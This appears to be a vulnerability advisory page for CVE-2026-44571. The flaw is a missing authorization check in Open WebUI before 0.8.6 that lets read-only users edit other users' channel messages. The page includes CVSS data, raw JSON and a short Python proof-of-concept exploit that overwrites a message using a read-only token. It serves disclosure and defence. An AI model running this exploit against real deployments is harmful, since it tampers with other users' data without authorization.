Security Vulnerability Report
中文
CVE-2026-44571 CVSS 6.5 MEDIUM

CVE-2026-44571

Published: 2026-05-15 22:16:53
Last Modified: 2026-05-15 23:16:21
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type="read") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com" channel_id = "test_channel" message_id = "target_message_id" attacker_token = "valid_read_only_token" # Vulnerable endpoint url = f"{target_url}/api/v1/channels/{channel_id}/messages/{message_id}/update" headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Payload to update another user's message payload = { "content": "Updated by unauthorized user via CVE-2026-44571" } # Send exploitation request response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful: Message updated without ownership.") else: print(f"[-] Exploit failed: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44571", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:53.473", "lastModified": "2026-05-15T23:16:20.823", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type=\"read\") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.